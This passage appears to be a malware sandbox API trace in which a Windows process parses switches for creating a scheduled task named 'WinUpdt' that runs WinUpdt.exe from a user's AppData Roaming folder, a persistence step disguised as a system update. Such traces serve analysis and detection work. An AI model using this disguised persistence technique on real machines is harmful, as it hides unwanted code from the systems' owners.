_memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.775] lstrlenW (lpString="tn") returned 2 [0067.775] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.775] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|create|") returned 8 [0067.775] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.775] lstrlenW (lpString="|create|") returned 8 [0067.776] lstrlenW (lpString="|tn|") returned 4 [0067.776] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0067.776] SetLastError (dwErrCode=0x490) [0067.776] lstrlenW (lpString="?") returned 1 [0067.776] lstrlenW (lpString="?") returned 1 [0067.776] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.776] lstrlenW (lpString="tn") returned 2 [0067.776] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.776] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|?|") returned 3 [0067.776] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.776] lstrlenW (lpString="|?|") returned 3 [0067.776] lstrlenW (lpString="|tn|") returned 4 [0067.776] SetLastError (dwErrCode=0x490) [0067.776] lstrlenW (lpString="s") returned 1 [0067.776] lstrlenW (lpString="s") returned 1 [0067.776] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.776] lstrlenW (lpString="tn") returned 2 [0067.776] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.776] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|s|") returned 3 [0067.776] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.776] lstrlenW (lpString="|s|") returned 3 [0067.776] lstrlenW (lpString="|tn|") returned 4 [0067.776] SetLastError (dwErrCode=0x490) [0067.776] lstrlenW (lpString="u") returned 1 [0067.776] lstrlenW (lpString="u") returned 1 [0067.776] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.776] lstrlenW (lpString="tn") returned 2 [0067.776] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.776] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|u|") returned 3 [0067.776] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.776] lstrlenW (lpString="|u|") returned 3 [0067.776] lstrlenW (lpString="|tn|") returned 4 [0067.776] SetLastError (dwErrCode=0x490) [0067.776] lstrlenW (lpString="p") returned 1 [0067.776] lstrlenW (lpString="p") returned 1 [0067.776] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.777] lstrlenW (lpString="tn") returned 2 [0067.777] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.777] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|p|") returned 3 [0067.777] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.777] lstrlenW (lpString="|p|") returned 3 [0067.777] lstrlenW (lpString="|tn|") returned 4 [0067.777] SetLastError (dwErrCode=0x490) [0067.777] lstrlenW (lpString="ru") returned 2 [0067.777] lstrlenW (lpString="ru") returned 2 [0067.777] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.777] lstrlenW (lpString="tn") returned 2 [0067.777] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.777] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ru|") returned 4 [0067.777] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.777] lstrlenW (lpString="|ru|") returned 4 [0067.777] lstrlenW (lpString="|tn|") returned 4 [0067.777] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0067.777] SetLastError (dwErrCode=0x490) [0067.777] lstrlenW (lpString="rp") returned 2 [0067.777] lstrlenW (lpString="rp") returned 2 [0067.777] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.777] lstrlenW (lpString="tn") returned 2 [0067.777] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.777] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|rp|") returned 4 [0067.777] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.777] lstrlenW (lpString="|rp|") returned 4 [0067.777] lstrlenW (lpString="|tn|") returned 4 [0067.777] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0067.777] SetLastError (dwErrCode=0x490) [0067.777] lstrlenW (lpString="sc") returned 2 [0067.777] lstrlenW (lpString="sc") returned 2 [0067.777] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.777] lstrlenW (lpString="tn") returned 2 [0067.777] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.777] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.777] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.777] lstrlenW (lpString="|sc|") returned 4 [0067.778] lstrlenW (lpString="|tn|") returned 4 [0067.778] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0067.778] SetLastError (dwErrCode=0x490) [0067.778] lstrlenW (lpString="mo") returned 2 [0067.778] lstrlenW (lpString="mo") returned 2 [0067.778] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.778] lstrlenW (lpString="tn") returned 2 [0067.778] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.778] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|mo|") returned 4 [0067.778] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.778] lstrlenW (lpString="|mo|") returned 4 [0067.778] lstrlenW (lpString="|tn|") returned 4 [0067.778] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0067.778] SetLastError (dwErrCode=0x490) [0067.778] lstrlenW (lpString="d") returned 1 [0067.778] lstrlenW (lpString="d") returned 1 [0067.778] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.778] lstrlenW (lpString="tn") returned 2 [0067.778] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.778] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|d|") returned 3 [0067.778] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.778] lstrlenW (lpString="|d|") returned 3 [0067.778] lstrlenW (lpString="|tn|") returned 4 [0067.778] SetLastError (dwErrCode=0x490) [0067.778] lstrlenW (lpString="m") returned 1 [0067.778] lstrlenW (lpString="m") returned 1 [0067.778] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.778] lstrlenW (lpString="tn") returned 2 [0067.778] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.778] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|m|") returned 3 [0067.778] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.778] lstrlenW (lpString="|m|") returned 3 [0067.778] lstrlenW (lpString="|tn|") returned 4 [0067.778] SetLastError (dwErrCode=0x490) [0067.778] lstrlenW (lpString="i") returned 1 [0067.778] lstrlenW (lpString="i") returned 1 [0067.778] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.779] lstrlenW (lpString="tn") returned 2 [0067.779] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.779] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|i|") returned 3 [0067.779] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.779] lstrlenW (lpString="|i|") returned 3 [0067.779] lstrlenW (lpString="|tn|") returned 4 [0067.779] SetLastError (dwErrCode=0x490) [0067.779] lstrlenW (lpString="tn") returned 2 [0067.779] lstrlenW (lpString="tn") returned 2 [0067.779] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.779] lstrlenW (lpString="tn") returned 2 [0067.779] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.779] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.779] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.779] lstrlenW (lpString="|tn|") returned 4 [0067.779] lstrlenW (lpString="|tn|") returned 4 [0067.779] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0067.779] SetLastError (dwErrCode=0x0) [0067.779] SetLastError (dwErrCode=0x0) [0067.779] lstrlenW (lpString="'WinUpdt'") returned 9 [0067.779] lstrlenW (lpString="-/") returned 2 [0067.779] StrChrIW (lpStart="-/", wMatch=0x27) returned 0x0 [0067.779] SetLastError (dwErrCode=0x490) [0067.779] SetLastError (dwErrCode=0x490) [0067.779] SetLastError (dwErrCode=0x0) [0067.779] lstrlenW (lpString="'WinUpdt'") returned 9 [0067.779] StrChrIW (lpStart="'WinUpdt'", wMatch=0x3a) returned 0x0 [0067.779] SetLastError (dwErrCode=0x490) [0067.779] SetLastError (dwErrCode=0x0) [0067.779] lstrlenW (lpString="'WinUpdt'") returned 9 [0067.779] SetLastError (dwErrCode=0x0) [0067.779] SetLastError (dwErrCode=0x0) [0067.779] lstrlenW (lpString="/tr") returned 3 [0067.779] lstrlenW (lpString="-/") returned 2 [0067.779] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.779] lstrlenW (lpString="create") returned 6 [0067.780] lstrlenW (lpString="create") returned 6 [0067.780] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.780] lstrlenW (lpString="tr") returned 2 [0067.780] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.780] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|create|") returned 8 [0067.780] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.780] lstrlenW (lpString="|create|") returned 8 [0067.780] lstrlenW (lpString="|tr|") returned 4 [0067.780] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0067.780] SetLastError (dwErrCode=0x490) [0067.780] lstrlenW (lpString="?") returned 1 [0067.780] lstrlenW (lpString="?") returned 1 [0067.780] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.780] lstrlenW (lpString="tr") returned 2 [0067.780] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.780] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|?|") returned 3 [0067.780] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.780] lstrlenW (lpString="|?|") returned 3 [0067.780] lstrlenW (lpString="|tr|") returned 4 [0067.780] SetLastError (dwErrCode=0x490) [0067.780] lstrlenW (lpString="s") returned 1 [0067.780] lstrlenW (lpString="s") returned 1 [0067.780] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.780] lstrlenW (lpString="tr") returned 2 [0067.780] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.780] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|s|") returned 3 [0067.780] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.780] lstrlenW (lpString="|s|") returned 3 [0067.780] lstrlenW (lpString="|tr|") returned 4 [0067.780] SetLastError (dwErrCode=0x490) [0067.780] lstrlenW (lpString="u") returned 1 [0067.780] lstrlenW (lpString="u") returned 1 [0067.780] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.780] lstrlenW (lpString="tr") returned 2 [0067.780] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.780] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|u|") returned 3 [0067.781] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.781] lstrlenW (lpString="|u|") returned 3 [0067.781] lstrlenW (lpString="|tr|") returned 4 [0067.781] SetLastError (dwErrCode=0x490) [0067.781] lstrlenW (lpString="p") returned 1 [0067.781] lstrlenW (lpString="p") returned 1 [0067.781] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.781] lstrlenW (lpString="tr") returned 2 [0067.781] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.781] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|p|") returned 3 [0067.781] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.781] lstrlenW (lpString="|p|") returned 3 [0067.781] lstrlenW (lpString="|tr|") returned 4 [0067.781] SetLastError (dwErrCode=0x490) [0067.781] lstrlenW (lpString="ru") returned 2 [0067.781] lstrlenW (lpString="ru") returned 2 [0067.781] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.781] lstrlenW (lpString="tr") returned 2 [0067.781] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.781] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ru|") returned 4 [0067.781] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.781] lstrlenW (lpString="|ru|") returned 4 [0067.781] lstrlenW (lpString="|tr|") returned 4 [0067.781] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0067.781] SetLastError (dwErrCode=0x490) [0067.781] lstrlenW (lpString="rp") returned 2 [0067.781] lstrlenW (lpString="rp") returned 2 [0067.781] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.781] lstrlenW (lpString="tr") returned 2 [0067.781] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.781] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|rp|") returned 4 [0067.781] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.781] lstrlenW (lpString="|rp|") returned 4 [0067.781] lstrlenW (lpString="|tr|") returned 4 [0067.781] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0067.781] SetLastError (dwErrCode=0x490) [0067.782] lstrlenW (lpString="sc") returned 2 [0067.782] lstrlenW (lpString="sc") returned 2 [0067.782] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.782] lstrlenW (lpString="tr") returned 2 [0067.782] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.782] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.782] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.782] lstrlenW (lpString="|sc|") returned 4 [0067.782] lstrlenW (lpString="|tr|") returned 4 [0067.782] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0067.782] SetLastError (dwErrCode=0x490) [0067.782] lstrlenW (lpString="mo") returned 2 [0067.782] lstrlenW (lpString="mo") returned 2 [0067.782] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.782] lstrlenW (lpString="tr") returned 2 [0067.782] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.782] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|mo|") returned 4 [0067.782] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.782] lstrlenW (lpString="|mo|") returned 4 [0067.782] lstrlenW (lpString="|tr|") returned 4 [0067.782] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0067.782] SetLastError (dwErrCode=0x490) [0067.782] lstrlenW (lpString="d") returned 1 [0067.782] lstrlenW (lpString="d") returned 1 [0067.782] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.782] lstrlenW (lpString="tr") returned 2 [0067.782] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.782] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|d|") returned 3 [0067.782] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.782] lstrlenW (lpString="|d|") returned 3 [0067.782] lstrlenW (lpString="|tr|") returned 4 [0067.782] SetLastError (dwErrCode=0x490) [0067.782] lstrlenW (lpString="m") returned 1 [0067.782] lstrlenW (lpString="m") returned 1 [0067.782] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.783] lstrlenW (lpString="tr") returned 2 [0067.783] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.783] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|m|") returned 3 [0067.783] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.783] lstrlenW (lpString="|m|") returned 3 [0067.783] lstrlenW (lpString="|tr|") returned 4 [0067.783] SetLastError (dwErrCode=0x490) [0067.783] lstrlenW (lpString="i") returned 1 [0067.783] lstrlenW (lpString="i") returned 1 [0067.783] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.783] lstrlenW (lpString="tr") returned 2 [0067.783] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.783] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|i|") returned 3 [0067.783] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.783] lstrlenW (lpString="|i|") returned 3 [0067.783] lstrlenW (lpString="|tr|") returned 4 [0067.783] SetLastError (dwErrCode=0x490) [0067.783] lstrlenW (lpString="tn") returned 2 [0067.783] lstrlenW (lpString="tn") returned 2 [0067.783] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.783] lstrlenW (lpString="tr") returned 2 [0067.783] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.783] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.783] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.783] lstrlenW (lpString="|tn|") returned 4 [0067.783] lstrlenW (lpString="|tr|") returned 4 [0067.783] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0067.783] SetLastError (dwErrCode=0x490) [0067.783] lstrlenW (lpString="tr") returned 2 [0067.783] lstrlenW (lpString="tr") returned 2 [0067.783] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.783] lstrlenW (lpString="tr") returned 2 [0067.783] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.783] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.783] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.784] lstrlenW (lpString="|tr|") returned 4 [0067.784] lstrlenW (lpString="|tr|") returned 4 [0067.784] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0067.784] SetLastError (dwErrCode=0x0) [0067.784] SetLastError (dwErrCode=0x0) [0067.784] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.784] lstrlenW (lpString="-/") returned 2 [0067.784] StrChrIW (lpStart="-/", wMatch=0x27) returned 0x0 [0067.784] SetLastError (dwErrCode=0x490) [0067.784] SetLastError (dwErrCode=0x490) [0067.784] SetLastError (dwErrCode=0x0) [0067.784] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.784] StrChrIW (lpStart="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'" [0067.784] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.784] _memicmp (_Buf1=0x674cf0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.784] _memicmp (_Buf1=0x674d20, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.784] SetLastError (dwErrCode=0x7a) [0067.784] SetLastError (dwErrCode=0x0) [0067.784] SetLastError (dwErrCode=0x0) [0067.784] lstrlenW (lpString="'C") returned 2 [0067.784] lstrlenW (lpString="-/") returned 2 [0067.784] StrChrIW (lpStart="-/", wMatch=0x27) returned 0x0 [0067.784] SetLastError (dwErrCode=0x490) [0067.784] SetLastError (dwErrCode=0x490) [0067.784] SetLastError (dwErrCode=0x0) [0067.784] _memicmp (_Buf1=0x674cd8, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.784] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.784] GetProcessHeap () returned 0x660000 [0067.784] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674ca8) returned 1 [0067.784] GetProcessHeap () returned 0x660000 [0067.784] RtlReAllocateHeap (Heap=0x660000, Flags=0xc, Ptr=0x674ca8, Size=0x78) returned 0x66f6f0 [0067.784] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.784] lstrlenW (lpString=" \x09") returned 2 [0067.784] StrChrW (lpStart=" \x09", wMatch=0x27) returned 0x0 [0067.784] StrChrW (lpStart=" \x09", wMatch=0x27) returned 0x0 [0067.784] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0067.784] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0067.784] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x4a) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x6a) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0067.785] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0067.785] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0067.786] 